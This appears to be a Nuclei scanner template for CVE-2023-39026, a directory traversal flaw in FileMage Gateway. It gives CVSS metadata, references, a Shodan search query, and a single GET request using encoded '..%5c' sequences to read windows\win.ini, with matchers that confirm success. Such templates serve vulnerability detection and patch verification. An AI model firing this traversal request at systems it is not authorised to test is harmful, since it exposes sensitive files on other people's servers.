46 lines
1.9 KiB
YAML
46 lines
1.9 KiB
YAML
id: CVE-2023-39026
|
|
|
|
info:
|
|
name: FileMage Gateway - Directory Traversal
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
|
|
reference:
|
|
- https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
|
|
- https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39026
|
|
- https://www.filemage.io/docs/updates.html#change-log
|
|
- http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-39026
|
|
cwe-id: CWE-22
|
|
epss-score: 0.06593
|
|
epss-percentile: 0.93039
|
|
cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: filemage
|
|
product: filemage
|
|
shodan-query: title:"FileMage"
|
|
tags: packetstorm,cve,cve2023,lfi,filemage
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains_all(body,'bit app support','extensions','fonts')"
|
|
- "contains(content_type, 'text/plain')"
|
|
- "status_code == 200"
|
|
condition: and
|
|
|
|
# digest: 4b0a004830460221009ecc3ceae72271b802cbc8d22a1ab22a5304a17ab37a313f090a723c78659d5f022100ea908ed60ce3075e54a66bf21a6844e4f907b36e2589dfbdb32335d4dc298297:922c64590222798bb761d5b6d8e72950 |